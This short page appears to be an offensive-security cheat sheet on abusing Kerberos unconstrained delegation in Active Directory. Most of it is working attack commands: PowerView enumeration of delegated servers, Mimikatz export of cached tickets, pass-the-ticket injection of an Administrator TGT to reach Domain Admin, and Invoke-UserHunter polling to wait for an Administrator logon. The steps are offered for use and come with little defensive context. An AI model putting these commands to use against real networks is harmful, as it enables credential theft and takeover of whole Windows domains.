UNCONSTRAINED DELEGATION
Unconstrained Delegation Access can be used via Servers
Enumerate servers with Unconstrained Delegation
Get-NetComputer -Unconstrained | Select -ExpandProperty name
To compromise another service with the listed services using Unconstrained Delegation, we need Admin privileges on the listed servers
After gaining Admin privilege on the server,
Export the tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
If you find any TGT ticket with "Administrator" privilege
You can "Pass The Ticket" to gain Domain Admin access on the unconstrained delegated server
Invoke-Mimikatz -Command '"kerberos::ptt <TGT TICKET PATH>"'
If you cannot find any TGT from "Administrator", we can wait for "Administrator" to access the Unconstrained Delegated server
Invoke-UserHunter -ComputerName <UNCONSTRAINED DELEGATED SERVER> -Poll 100 -UserName Administrator -Delay 5
Last updated